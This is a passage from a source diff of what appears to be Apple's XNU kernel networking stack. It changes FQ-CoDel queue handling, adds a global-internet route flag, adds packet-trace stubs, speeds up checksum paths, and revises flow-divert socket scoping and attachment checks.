-               fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500,
-                   2, MBUF_SC_BK);
-               fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500,
-                   4, MBUF_SC_BE);
-               fq_if_classq_init(fqs, FQ_IF_RD_INDEX, 1500,
-                   4, MBUF_SC_RD);
-               fq_if_classq_init(fqs, FQ_IF_OAM_INDEX, 1500,
-                   4, MBUF_SC_OAM);
-               fq_if_classq_init(fqs, FQ_IF_AV_INDEX, 3000,
-                   6, MBUF_SC_AV);
-               fq_if_classq_init(fqs, FQ_IF_RV_INDEX, 3000,
-                   6, MBUF_SC_RV);
-               fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000,
-                   6, MBUF_SC_VI);
-               fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600,
-                   8, MBUF_SC_VO);
-               fq_if_classq_init(fqs, FQ_IF_CTL_INDEX, 600,
-                   8, MBUF_SC_CTL);
+               _FQ_CLASSQ_INIT(fqs, BK_SYS, quantum);
+               _FQ_CLASSQ_INIT(fqs, BK, quantum);
+               _FQ_CLASSQ_INIT(fqs, BE, quantum);
+               _FQ_CLASSQ_INIT(fqs, RD, quantum);
+               _FQ_CLASSQ_INIT(fqs, OAM, quantum);
+               _FQ_CLASSQ_INIT(fqs, AV, quantum);
+               _FQ_CLASSQ_INIT(fqs, RV, quantum);
+               _FQ_CLASSQ_INIT(fqs, VI, quantum);
+               _FQ_CLASSQ_INIT(fqs, VO, quantum);
+               _FQ_CLASSQ_INIT(fqs, CTL, quantum);
        }
 
        err = ifclassq_attach(ifq, PKTSCHEDT_FQ_CODEL, fqs);
-
        if (err != 0) {
-               printf("%s: error from ifclassq_attach, "
+               os_log_error(OS_LOG_DEFAULT, "%s: error from ifclassq_attach, "
                    "failed to attach fq_if: %d\n", __func__, err);
                fq_if_destroy(fqs);
        }
        return err;
+#undef _FQ_CLASSQ_INIT
 }
 
 fq_t *
@@ -893,7 +1055,8 @@ fq_if_hash_pkt(fq_if_t *fqs, u_int32_t flowid, mbuf_svc_class_t svc_class,
 }
 
 void
-fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq)
+fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
+    bool destroy_now)
 {
        u_int8_t hash_id;
        hash_id = FQ_IF_FLOW_HASH_ID(fq->fq_flowhash);
@@ -901,7 +1064,10 @@ fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq)
            fq_hashlink);
        fq_cl->fcl_stat.fcl_flows_cnt--;
        IFCQ_CONVERT_LOCK(fqs->fqs_ifq);
-       fq_destroy(fq);
+       fq->fq_flags |= FQF_DESTROYED;
+       if (destroy_now) {
+               fq_destroy(fq);
+       }
 }
 
 inline boolean_t
@@ -913,7 +1079,7 @@ fq_if_at_drop_limit(fq_if_t *fqs)
 
 static void
 fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
-    bool remove_hash)
+    bool remove_hash, bool destroy)
 {
        /*
         * Remove the flow queue if it is empty
@@ -927,7 +1093,7 @@ fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
 
        if (remove_hash) {
                /* Remove from the hash list */
-               fq_if_destroy_flow(fqs, fq_cl, fq);
+               fq_if_destroy_flow(fqs, fq_cl, fq, destroy);
        }
 }
 
@@ -986,7 +1152,7 @@ fq_if_drop_packet(fq_if_t *fqs)
        if (fq_empty(fq)) {
                fqs->fqs_large_flow = NULL;
                if (fq->fq_flags & FQF_OLD_FLOW) {
-                       fq_if_empty_old_flow(fqs, fq_cl, fq, true);
+                       fq_if_empty_old_flow(fqs, fq_cl, fq, true, true);
                } else {
                        VERIFY(fq->fq_flags & FQF_NEW_FLOW);
                        fq_if_empty_new_flow(fq, fq_cl, true);
@@ -1024,14 +1190,21 @@ fq_if_is_flow_heavy(fq_if_t *fqs, fq_t *fq)
 }
 
 boolean_t
-fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid,
-    uint8_t flowsrc, fq_if_classq_t *fq_cl)
+fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint8_t flowsrc,
+    fq_t *fq, fq_if_classq_t *fq_cl)
 {
        struct flowadv_fcentry *fce;
 
+#if DEBUG || DEVELOPMENT
+       if (__improbable(ifclassq_flow_control_adv == 0)) {
+               os_log(OS_LOG_DEFAULT, "%s: skipped flow control", __func__);
+               return TRUE;
+       }
+#endif /* DEBUG || DEVELOPMENT */
+
        STAILQ_FOREACH(fce, &fqs->fqs_fclist, fce_link) {
                if ((uint8_t)fce->fce_flowsrc_type == flowsrc &&
-                   fce->fce_flowid == flowid) {
+                   fce->fce_flowid == fq->fq_flowhash) {
                        /* Already on flowcontrol list */
                        return TRUE;
                }
@@ -1042,6 +1215,11 @@ fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid,
                /* XXX Add number of bytes in the queue */
                STAILQ_INSERT_TAIL(&fqs->fqs_fclist, fce, fce_link);
                fq_cl->fcl_stat.fcl_flow_control++;
+               os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, "
+                   "flow: 0x%x, iface: %s\n", __func__,
+                   fq_cl->fcl_stat.fcl_flow_control,
+                   fq->fq_sc_index, fce->fce_flowsrc_type, fq->fq_flowhash,
+                   if_name(fqs->fqs_ifq->ifcq_ifp));
        }
        return (fce != NULL) ? TRUE : FALSE;
 }
@@ -1061,23 +1239,30 @@ fq_if_flow_feedback(fq_if_t *fqs, fq_t *fq, fq_if_classq_t *fq_cl)
                STAILQ_REMOVE(&fqs->fqs_fclist, fce, flowadv_fcentry,
                    fce_link);
                STAILQ_NEXT(fce, fce_link) = NULL;
-               flowadv_add_entry(fce);
                fq_cl->fcl_stat.fcl_flow_feedback++;
+               os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, "
+                   "flow: 0x%x, iface: %s\n", __func__,
+                   fq_cl->fcl_stat.fcl_flow_feedback, fq->fq_sc_index,
+                   fce->fce_flowsrc_type, fce->fce_flowid,
+                   if_name(fqs->fqs_ifq->ifcq_ifp));
+               flowadv_add_entry(fce);
        }
        fq->fq_flags &= ~FQF_FLOWCTL_ON;
 }
 
 void
 fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit,
-    int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *tail,
-    uint32_t *retpktcnt, uint32_t *retbytecnt, boolean_t drvmgmt)
+    int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *bottom,
+    uint32_t *retpktcnt, uint32_t *retbytecnt, flowq_dqlist_t *fq_dqlist,
+    boolean_t drvmgmt)
 {
        fq_t *fq = NULL, *tfq = NULL;
        flowq_stailq_t temp_stailq;
-       u_int32_t pktcnt, bytecnt;
+       uint32_t pktcnt, bytecnt;
        boolean_t qempty, limit_reached = FALSE;
        classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last);
        fq_getq_flow_t fq_getq_flow_fn;
+       classq_pkt_t *head, *tail;
 
        switch (fqs->fqs_ptype) {
        case QP_MBUF:
@@ -1107,8 +1292,20 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit,
                ASSERT((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) ==
                    FQF_NEW_FLOW);
 
+               if (fq_dqlist != NULL) {
+                       if (!fq->fq_in_dqlist) {
+                               fq_dqlist_add(fq_dqlist, fq);
+                       }
+                       head = &fq->fq_dq_head;
+                       tail = &fq->fq_dq_tail;
+               } else {
+                       ASSERT(!fq->fq_in_dqlist);
+                       head = top;
+                       tail = &last;
+               }
+
                limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit,
-                   pktlimit, top, &last, &bytecnt, &pktcnt, &qempty,
+                   pktlimit, head, tail, &bytecnt, &pktcnt, &qempty,
                    PKTF_NEW_FLOW);
 
                if (fq->fq_deficit <= 0 || qempty) {
@@ -1123,12 +1320,26 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit,
        STAILQ_FOREACH_SAFE(fq, &fq_cl->fcl_old_flows, fq_actlink, tfq) {
                VERIFY((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) ==
                    FQF_OLD_FLOW);
+               bool destroy = true;
+
+               if (fq_dqlist != NULL) {
+                       if (!fq->fq_in_dqlist) {
+                               fq_dqlist_add(fq_dqlist, fq);
+                       }
+                       head = &fq->fq_dq_head;
+                       tail = &fq->fq_dq_tail;
+                       destroy = false;
+               } else {
+                       ASSERT(!fq->fq_in_dqlist);
+                       head = top;
+                       tail = &last;
+               }
 
                limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit,
-                   pktlimit, top, &last, &bytecnt, &pktcnt, &qempty, 0);
+                   pktlimit, head, tail, &bytecnt, &pktcnt, &qempty, 0);
 
                if (qempty) {
-                       fq_if_empty_old_flow(fqs, fq_cl, fq, true);
+                       fq_if_empty_old_flow(fqs, fq_cl, fq, true, destroy);
                } else if (fq->fq_deficit <= 0) {
                        STAILQ_REMOVE(&fq_cl->fcl_old_flows, fq,
                            flowq, fq_actlink);
@@ -1151,19 +1362,18 @@ done:
        } else if (!STAILQ_EMPTY(&temp_stailq)) {
                fq_cl->fcl_old_flows = temp_stailq;
        }
-
        if (last.cp_mbuf != NULL) {
                VERIFY(top->cp_mbuf != NULL);
-               if (tail != NULL) {
-                       *tail = last;
-               }
-               if (retpktcnt != NULL) {
-                       *retpktcnt = pktcnt;
-               }
-               if (retbytecnt != NULL) {
-                       *retbytecnt = bytecnt;
+               if (bottom != NULL) {
+                       *bottom = last;
                }
        }
+       if (retpktcnt != NULL) {
+               *retpktcnt = pktcnt;
+       }
+       if (retbytecnt != NULL) {
+               *retbytecnt = bytecnt;
+       }
 }
 
 void
index ce05193bce52fffb95aadcc89c729fbae91fd60c..4228b6e80b0350a680c52f9c26861d654847ae62 100644 (file)
@@ -212,8 +212,8 @@ extern struct flowq *fq_if_hash_pkt(fq_if_t *, u_int32_t, mbuf_svc_class_t,
 extern boolean_t fq_if_at_drop_limit(fq_if_t *);
 extern void fq_if_drop_packet(fq_if_t *);
 extern void fq_if_is_flow_heavy(fq_if_t *, struct flowq *);
-extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint32_t,
-    uint8_t, fq_if_classq_t *);
+extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint8_t,
+    struct flowq *, fq_if_classq_t *);
 extern void fq_if_flow_feedback(fq_if_t *, struct flowq *, fq_if_classq_t *);
 extern int fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags,
     classq_pkt_type_t ptype);
@@ -221,7 +221,7 @@ extern void fq_if_teardown_ifclassq(struct ifclassq *ifq);
 extern int fq_if_getqstats_ifclassq(struct ifclassq *ifq, u_int32_t qid,
     struct if_ifclassq_stats *ifqs);
 extern void fq_if_destroy_flow(fq_if_t *, fq_if_classq_t *,
-    struct flowq *);
+    struct flowq *, bool);
 
 
 #endif /* BSD_KERNEL_PRIVATE */
index c9ea3960c5b8d819ab19e1c2b553a3de18675fe0..a9745cb4208a1c10f7a3966296c980b60cc34df3 100644 (file)
@@ -95,9 +95,6 @@ static char normal_chars[] = {0, 0x80, 0xc0, 0xe0, 0xf0, 0xf8, 0xfc, 0xfe, -1};
 static char *rn_zeros, *rn_ones;
 
 
-extern lck_grp_t        *domain_proto_mtx_grp;
-extern lck_attr_t       *domain_proto_mtx_attr;
-
 #define rn_masktop (mask_rnhead->rnh_treetop)
 #undef Bcmp
 #define Bcmp(a, b, l) \
index a31e25bb60577f2e8359104fdb64bc670b28d4c0..91000a4ee0f250e9bc60afb0bb4117dd0dce40bb 100644 (file)
@@ -1847,6 +1847,14 @@ rtrequest_common_locked(int req, struct sockaddr *dst0,
            int, flags, unsigned int, ifscope);
 
        LCK_MTX_ASSERT(rnh_lock, LCK_MTX_ASSERT_OWNED);
+
+#if !(DEVELOPMENT || DEBUG)
+       /*
+        * Setting the global internet flag external is only for testing
+        */
+       flags &= ~RTF_GLOBAL;
+#endif /* !(DEVELOPMENT || DEBUG) */
+
        /*
         * Find the correct routing tree to use for this Address Family
         */
@@ -2342,6 +2350,16 @@ makeroute:
                 * necp client watchers to re-evaluate
                 */
                if (SA_DEFAULT(rt_key(rt))) {
+                       /*
+                        * Mark default routes as (potentially) leading to the global internet
+                        * this can be used for policy decisions.
+                        * The clone routes will inherit this flag.
+                        * We check against the host flag as this works for default routes that have
+                        * a gateway and defaults routes when all subnets are local.
+                        */
+                       if (req == RTM_ADD && (rt->rt_flags & RTF_HOST) == 0) {
+                               rt->rt_flags |= RTF_GLOBAL;
+                       }
                        if (rt->rt_ifp != NULL) {
                                ifnet_touch_lastupdown(rt->rt_ifp);
                        }
index 613d61709923281193ce544bdc0a3c82b9d3698a..42cec6fab23b943dec49fb206dfcb9812c96fbe0 100644 (file)
@@ -314,7 +314,8 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea
 #define RTF_PROXY       0x8000000       /* proxying, no interface scope */
 #define RTF_ROUTER      0x10000000      /* host is a router */
 #define RTF_DEAD        0x20000000      /* Route entry is being freed */
-                                        /* 0x40000000 and up unassigned */
+#define RTF_GLOBAL      0x40000000      /* route to destination of the global internet */
+                                        /* 0x80000000 unassigned */
 
 #define RTPRF_OURS      RTF_PROTO3      /* set on routes we manage */
 #define RTF_BITS \
@@ -322,7 +323,7 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea
        "\10DELCLONE\11CLONING\12XRESOLVE\13LLINFO\14STATIC\15BLACKHOLE" \
        "\16NOIFREF\17PROTO2\20PROTO1\21PRCLONING\22WASCLONED\23PROTO3" \
        "\25PINNED\26LOCAL\27BROADCAST\30MULTICAST\31IFSCOPE\32CONDEMNED" \
-       "\33IFREF\34PROXY\35ROUTER"
+       "\33IFREF\34PROXY\35ROUTER\37GLOBAL"
 
 #define IS_DIRECT_HOSTROUTE(rt) \
        (((rt)->rt_flags & (RTF_HOST | RTF_GATEWAY)) == RTF_HOST)
index f984a3e886a7fed0585773977df8cbd03ba483e5..cfeb61b53e266bf8b2661a73c6e12aacc7525564 100644 (file)
@@ -156,6 +156,10 @@ STUB(kern_packet_append);
 STUB(kern_packet_get_next);
 STUB(kern_packet_set_chain_counts);
 STUB(kern_packet_get_chain_counts);
+STUB(kern_packet_trace_start);
+STUB(kern_packet_trace_end);
+STUB(kern_packet_is_traced);
+STUB(kern_packet_trace_event);
 STUB(kern_pbufpool_alloc);
 STUB(kern_pbufpool_alloc_batch);
 STUB(kern_pbufpool_alloc_batch_callback);
index 2cdb63596e8b69ad8a2ccfe52e2669e6c02a1e03..e1cdf126ebb73b8740f41bee319de825660b6fdd 100644 (file)
@@ -108,27 +108,45 @@ uint32_t
 os_cpu_in_cksum(const void *data, uint32_t len, uint32_t initial_sum)
 {
        /*
-        * If data is 4-bytes aligned, length is multiple of 4-bytes,
-        * and the amount to checksum is small, this would be quicker;
-        * this is suitable for IPv4 header.
+        * If data is 4-bytes aligned (conditional), length is multiple
+        * of 4-bytes (required), and the amount to checksum is small,
+        * this would be quicker; this is suitable for IPv4/TCP header.
         */
-       if (IS_P2ALIGNED(data, sizeof(uint32_t)) &&
-           len <= 64 && (len & 3) == 0) {
+       if (
+#if !defined(__arm64__) && !defined(__x86_64__)
+               IS_P2ALIGNED(data, sizeof(uint32_t)) &&
+#endif /* !__arm64__ && !__x86_64__ */
+               len <= 64 && (len & 3) == 0) {
                uint8_t *p = __DECONST(uint8_t *, data);
                uint64_t sum = initial_sum;
 
-               if (PREDICT_TRUE(len == 20)) {  /* simple IPv4 header */
+               switch (len) {
+               case 20:                /* simple IPv4 or TCP header */
                        sum += *(uint32_t *)(void *)p;
                        sum += *(uint32_t *)(void *)(p + 4);
                        sum += *(uint32_t *)(void *)(p + 8);
                        sum += *(uint32_t *)(void *)(p + 12);
                        sum += *(uint32_t *)(void *)(p + 16);
-               } else {
+                       break;
+
+               case 32:                /* TCP header + timestamp option */
+                       sum += *(uint32_t *)(void *)p;
+                       sum += *(uint32_t *)(void *)(p + 4);
+                       sum += *(uint32_t *)(void *)(p + 8);
+                       sum += *(uint32_t *)(void *)(p + 12);
+                       sum += *(uint32_t *)(void *)(p + 16);
+                       sum += *(uint32_t *)(void *)(p + 20);
+                       sum += *(uint32_t *)(void *)(p + 24);
+                       sum += *(uint32_t *)(void *)(p + 28);
+                       break;
+
+               default:
                        while (len) {
                                sum += *(uint32_t *)(void *)p;
                                p += 4;
                                len -= 4;
                        }
+                       break;
                }
 
                /* fold 64-bit to 16-bit (deferred carries) */
index e278115c2717d0ca1b6e5177913be27b748e5471..818eb1beaf34c8a77b0eb0f64be2136de571bb2f 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2012-2017, 2020 Apple Inc. All rights reserved.
+ * Copyright (c) 2012-2017, 2020, 2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -80,6 +80,8 @@
 #define FLOW_DIVERT_NOTIFY_ON_RECEIVED  0x00000080
 #define FLOW_DIVERT_IMPLICIT_CONNECT    0x00000100
 #define FLOW_DIVERT_DID_SET_LOCAL_ADDR  0x00000200
+#define FLOW_DIVERT_HAS_TOKEN           0x00000400
+#define FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR 0x00000800
 
 #define FDLOG(level, pcb, format, ...) \
        os_log_with_type(OS_LOG_DEFAULT, flow_divert_syslog_type_to_oslog_type(level), "(%u): " format "\n", (pcb)->hash, __VA_ARGS__)
@@ -1374,6 +1376,13 @@ flow_divert_send_connect_result(struct flow_divert_pcb *fd_cb)
                goto done;
        }
 
+       if (fd_cb->local_endpoint.sa.sa_family == AF_INET || fd_cb->local_endpoint.sa.sa_family == AF_INET6) {
+               error = flow_divert_packet_append_tlv(packet, FLOW_DIVERT_TLV_LOCAL_ADDR, fd_cb->local_endpoint.sa.sa_len, &(fd_cb->local_endpoint.sa));
+               if (error) {
+                       goto done;
+               }
+       }
+
        error = flow_divert_send_packet(fd_cb, packet, TRUE);
        if (error) {
                goto done;
@@ -1812,12 +1821,12 @@ done:
 }
 
 static void
-flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint, bool port_only)
+flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint)
 {
        struct inpcb *inp = sotoinpcb(fd_cb->so);
 
        if (local_endpoint->sa_family == AF_INET6) {
-               if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && !port_only) {
+               if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) {
                        fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR;
                        inp->in6p_laddr = (satosin6(local_endpoint))->sin6_addr;
                }
@@ -1825,7 +1834,7 @@ flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *l
                        inp->inp_lport = (satosin6(local_endpoint))->sin6_port;
                }
        } else if (local_endpoint->sa_family == AF_INET) {
-               if (inp->inp_laddr.s_addr == INADDR_ANY && !port_only) {
+               if (inp->inp_laddr.s_addr == INADDR_ANY && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) {
                        fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR;
                        inp->inp_laddr = (satosin(local_endpoint))->sin_addr;
                }
@@ -2032,8 +2041,10 @@ flow_divert_disable(struct flow_divert_pcb *fd_cb)
                    NULL,
                    (last_proc != NULL ? last_proc : current_proc()));
 
-               if (error) {
+               if (error && error != EWOULDBLOCK) {
                        FDLOG(LOG_ERR, fd_cb, "Failed to send queued data using the socket's original protocol: %d", error);
+               } else {
+                       error = 0;
                }
        } else if (SOCK_TYPE(so) == SOCK_DGRAM) {
                struct sockbuf *sb = &so->so_snd;
@@ -2134,6 +2145,78 @@ done:
        }
 }
 
+static void
+flow_divert_scope(struct flow_divert_pcb *fd_cb, int out_if_index, bool derive_new_address)
+{
+       struct socket *so = NULL;
+       struct inpcb *inp = NULL;
+       struct ifnet *current_ifp = NULL;
+       struct ifnet *new_ifp = NULL;
+       int error = 0;
+
+       so = fd_cb->so;
+       if (so == NULL) {
+               return;
+       }
+
+       inp = sotoinpcb(so);
+
+       if (out_if_index <= 0) {
+               return;
+       }
+
+       if (inp->inp_vflag & INP_IPV6) {
+               current_ifp = inp->in6p_last_outifp;
+       } else {
+               current_ifp = inp->inp_last_outifp;
+       }
+
+       if (current_ifp != NULL) {
+               if (current_ifp->if_index == out_if_index) {
+                       /* No change */
+                       return;
+               }
+
+               /* Scope the socket to the given interface */
+               error = inp_bindif(inp, out_if_index, &new_ifp);
+               if (error != 0) {
+                       FDLOG(LOG_ERR, fd_cb, "failed to scope to %d because inp_bindif returned %d", out_if_index, error);
+                       return;
+               }
+
+               if (derive_new_address && fd_cb->original_remote_endpoint != NULL) {
+                       /* Get the appropriate address for the given interface */
+                       if (inp->inp_vflag & INP_IPV6) {
+                               inp->in6p_laddr = sa6_any.sin6_addr;
+                               error = in6_pcbladdr(inp, fd_cb->original_remote_endpoint, &(fd_cb->local_endpoint.sin6.sin6_addr), NULL);
+                       } else {
+                               inp->inp_laddr.s_addr = INADDR_ANY;
+                               error = in_pcbladdr(inp, fd_cb->original_remote_endpoint, &(fd_cb->local_endpoint.sin.sin_addr), IFSCOPE_NONE, NULL, 0);
+                       }
+
+                       if (error != 0) {
+                               FDLOG(LOG_WARNING, fd_cb, "failed to derive a new local address from %d because in_pcbladdr returned %d", out_if_index, error);
+                       }
+               }
+       } else {
+               ifnet_head_lock_shared();
+               if (out_if_index <= if_index) {
+                       new_ifp = ifindex2ifnet[out_if_index];
+               }
+               ifnet_head_done();
+       }
+
+       /* Update the "last interface" of the socket */
+       if (new_ifp != NULL) {
+               if (inp->inp_vflag & INP_IPV6) {
+                       inp->in6p_last_outifp = new_ifp;
+               } else {
+                       inp->inp_last_outifp = new_ifp;
+               }
+
+       }
+}
+
 static void
 flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offset)
 {
@@ -2213,12 +2296,17 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet,
        FDLOCK(fd_cb);
        if (fd_cb->so != NULL) {
                struct inpcb                            *inp = NULL;
-               struct ifnet                            *ifp = NULL;
                struct flow_divert_group        *old_group;
                struct socket *so = fd_cb->so;
+               bool local_address_is_valid = false;
 
                socket_lock(so, 0);
 
+               if (!(so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring connect result");
+                       goto done;
+               }
+
                if (SOCK_TYPE(so) == SOCK_STREAM && !(so->so_state & SS_ISCONNECTING)) {
                        FDLOG0(LOG_ERR, fd_cb, "TCP socket is not in the connecting state, ignoring connect result");
                        goto done;
@@ -2233,13 +2321,28 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet,
                if (flow_divert_is_sockaddr_valid(&(local_endpoint.sa))) {
                        if (local_endpoint.sa.sa_family == AF_INET) {
                                local_endpoint.sa.sa_len = sizeof(struct sockaddr_in);
+                               if ((inp->inp_vflag & INP_IPV4) && local_endpoint.sin.sin_addr.s_addr != INADDR_ANY) {
+                                       local_address_is_valid = true;
+                                       fd_cb->local_endpoint = local_endpoint;
+                                       inp->inp_laddr.s_addr = INADDR_ANY;
+                               } else {
+                                       fd_cb->local_endpoint.sin.sin_port = local_endpoint.sin.sin_port;
+                               }
                        } else if (local_endpoint.sa.sa_family == AF_INET6) {
                                local_endpoint.sa.sa_len = sizeof(struct sockaddr_in6);
+                               if ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&local_endpoint.sin6.sin6_addr)) {
+                                       local_address_is_valid = true;
+                                       fd_cb->local_endpoint = local_endpoint;
+                                       inp->in6p_laddr = sa6_any.sin6_addr;
+                               } else {
+                                       fd_cb->local_endpoint.sin6.sin6_port = local_endpoint.sin6.sin6_port;
+                               }
                        }
-                       fd_cb->local_endpoint = local_endpoint;
-                       flow_divert_set_local_endpoint(fd_cb, &(local_endpoint.sa), (SOCK_TYPE(so) == SOCK_DGRAM));
                }
 
+               flow_divert_scope(fd_cb, out_if_index, !local_address_is_valid);
+               flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa));
+
                if (flow_divert_is_sockaddr_valid(&(remote_endpoint.sa)) && SOCK_TYPE(so) == SOCK_STREAM) {
                        if (remote_endpoint.sa.sa_family == AF_INET) {
                                remote_endpoint.sa.sa_len = sizeof(struct sockaddr_in);
@@ -2270,22 +2373,6 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet,
                        }
                }
 
-               ifnet_head_lock_shared();
-               if (out_if_index > 0 && out_if_index <= if_index) {
-                       ifp = ifindex2ifnet[out_if_index];
-               }
-
-               if (ifp != NULL) {
-                       if (inp->inp_vflag & INP_IPV4) {
-                               inp->inp_last_outifp = ifp;
-                       } else if (inp->inp_vflag & INP_IPV6) {
-                               inp->in6p_last_outifp = ifp;
-                       }
-               } else {
-                       error = EINVAL;
-               }
-               ifnet_head_done();
-
                if (error) {
                        goto set_socket_state;
                }
@@ -2398,6 +2485,11 @@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse
        if (fd_cb->so != NULL) {
                socket_lock(fd_cb->so, 0);
 
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring close from provider");
+                       goto done;
+               }
+
                fd_cb->so->so_error = (uint16_t)ntohl(close_error);
 
                flow_divert_update_closed_state(fd_cb, how, TRUE);
@@ -2410,7 +2502,7 @@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse
                } else if (how == SHUT_WR) {
                        socantsendmore(fd_cb->so);
                }
-
+done:
                socket_unlock(fd_cb->so, 0);
        }
        FDUNLOCK(fd_cb);
@@ -2457,6 +2549,11 @@ flow_divert_handle_data(struct flow_divert_pcb *fd_cb, mbuf_t packet, size_t off
 
                socket_lock(fd_cb->so, 0);
 
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring inbound data");
+                       goto done;
+               }
+
                if (sbspace(&fd_cb->so->so_rcv) == 0) {
                        error = ENOBUFS;
                        fd_cb->flags |= FLOW_DIVERT_NOTIFY_ON_RECEIVED;
@@ -2574,8 +2671,15 @@ flow_divert_handle_read_notification(struct flow_divert_pcb *fd_cb, mbuf_t packe
        FDLOCK(fd_cb);
        if (fd_cb->so != NULL) {
                socket_lock(fd_cb->so, 0);
+
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring read notification");
+                       goto done;
+               }
+
                fd_cb->send_window += ntohl(read_count);
                flow_divert_send_buffered_data(fd_cb, FALSE);
+done:
                socket_unlock(fd_cb->so, 0);
        }
        FDUNLOCK(fd_cb);
@@ -2655,25 +2759,14 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe
        if (fd_cb->so != NULL) {
                socket_lock(fd_cb->so, 0);
 
-               if (out_if_index > 0) {
-                       struct inpcb *inp = NULL;
-                       struct ifnet *ifp = NULL;
-
-                       inp = sotoinpcb(fd_cb->so);
-
-                       ifnet_head_lock_shared();
-                       if (out_if_index <= if_index) {
-                               ifp = ifindex2ifnet[out_if_index];
-                       }
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring properties update");
+                       goto done;
+               }
 
-                       if (ifp != NULL) {
-                               if (inp->inp_vflag & INP_IPV4) {
-                                       inp->inp_last_outifp = ifp;
-                               } else if (inp->inp_vflag & INP_IPV6) {
-                                       inp->in6p_last_outifp = ifp;
-                               }
-                       }
-                       ifnet_head_done();
+               if (out_if_index > 0) {
+                       flow_divert_scope(fd_cb, out_if_index, true);
+                       flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa));
                }
 
                if (app_data_length > 0) {
@@ -2695,7 +2788,7 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe
                                FDLOG(LOG_ERR, fd_cb, "Failed to allocate a buffer of size %u to hold the application data from the properties update", app_data_length);
                        }
                }
-
+done:
                socket_unlock(fd_cb->so, 0);
        }
        FDUNLOCK(fd_cb);
@@ -3336,6 +3429,13 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t
                        goto done;
                }
 
+               if (SOCK_TYPE(so) == SOCK_STREAM || /* TCP or */
+                   !implicit || /* connect() was called or */
+                   ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr)) || /* local address is not un-specified */
+                   ((inp->inp_vflag & INP_IPV4) && inp->inp_laddr.s_addr != INADDR_ANY)) {
+                       fd_cb->flags |= FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR;
+               }
+
